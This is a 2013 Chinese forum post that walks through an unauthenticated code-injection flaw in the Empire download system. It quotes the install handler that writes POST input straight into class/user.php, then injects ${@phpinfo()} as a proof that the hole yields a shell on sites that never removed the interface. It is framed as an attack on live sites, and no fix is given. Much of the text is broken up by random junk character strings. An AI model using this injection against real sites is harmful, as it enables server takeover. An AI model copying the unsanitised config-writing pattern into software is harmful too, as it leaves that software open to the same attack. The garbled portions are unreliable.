这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们2 w- O, } O) L) l
" ^" Q4 _6 c: x( x4 ~ ]3 y' Q; J% I1 ^% e' K: T' y
这是帝国的一套下载系统 如图
- b) h( p5 a0 v6 k' ]ps(不需要任何账户和密码,直接写shell)
8 ?/ p& f x$ D5 O' m" J0 o& b由于很多站是由于下载要整合discuz 等等一些论坛....
( P- ?, ` b, }% ]( M
, h |& V s9 v x) `$ D而帝国他又有一个万能接口,如图 $ j3 E% c; n+ {( d7 ^1 R' b A6 B
* J+ G: C1 Y$ D( H) X
8 e G+ I4 i+ Y9 w9 `) c7 {
而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
* r5 S' c7 G( {
. z6 J! e+ f; R4 K当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
8 F; a2 J3 O ?4 P
* d" l% T- {9 Y1 V; @' }5 \在data/fun.php中的15行$ @! k- W: |; `/ U
# a/ O" ?+ ^, ]0 Q6 f- x
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {2 h% t4 e, A& `# {3 y: M
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
- k( Z' b9 ^& W/ F# \ D
5 E' F5 f/ ~. D8 G; t( B s这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
( b( l' R! R, O$ M1 r) W- |( P( A$ z$ z
他将传进来的变量进行了切割,然后赋给了$filetext
; V: |6 D0 @; q) X. r
6 [5 v. x2 i, v1 P$ z/ a$ }然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
0 j! g) }3 W" T- u- t& x
8 F }8 q1 m2 `& P e我们看看写入的结果,随便填一个
! F. R7 J$ R1 D' k; {. G( u. D1 O5 I
" C2 {; R$ |4 } I( N
, ^2 K L1 a$ s) D% T5 F, n' d. ^
2 B. X# B- {) m5 s, J9 R0 C
9 x+ w! b: J) m( _$ s; L' {! K, F s# y: v4 H6 C2 |
! ~/ l. j7 l! H" R3 G3 z* q
2 F3 X- ]( R( @( |/ ]
3 ^# |/ g' q8 i) d: {: G n4 n/ ]3 s& ]5 u" J6 U
+ V3 i7 d9 s. G( ]; M
% m- {7 ~4 R: d# R8 P9 ]" s9 ?0 M4 e+ ~
' @3 E8 U7 v( w( `* m8 K5 T( I3 @
1 X5 N' _3 r' X9 @
. J; G7 D6 a/ z2 N; B5 Y, k& i% i: P$ f
# v; f1 G+ D6 U' z2 x
7 O* \ i/ S0 R0 O1 A+ }) P$ p; l" r) n
) v( A& M7 z8 R& N$ M所以我们淫荡点,写个${@phpinfo()}试试 % V; l6 h) w: p/ M5 p" x* F
然后访问以下class/user.php这个文件
+ d. N7 b' e: ~( U+ G/ S; [日了吧
2 O( _9 ?% c9 S. t" G9 }- u% o
& @5 q( W4 [9 Y; o3 A3 N5 D3 y, W1 `) ]8 o2 C8 X+ R$ s0 `
! d0 } Z5 x8 ?' @% Q1 r
6 p% r2 f# H9 Q( r. U! V
# u1 s* J# G3 X% [. R; Q | 
发表于 2013-1-23 09:34:37
收藏
支持
反对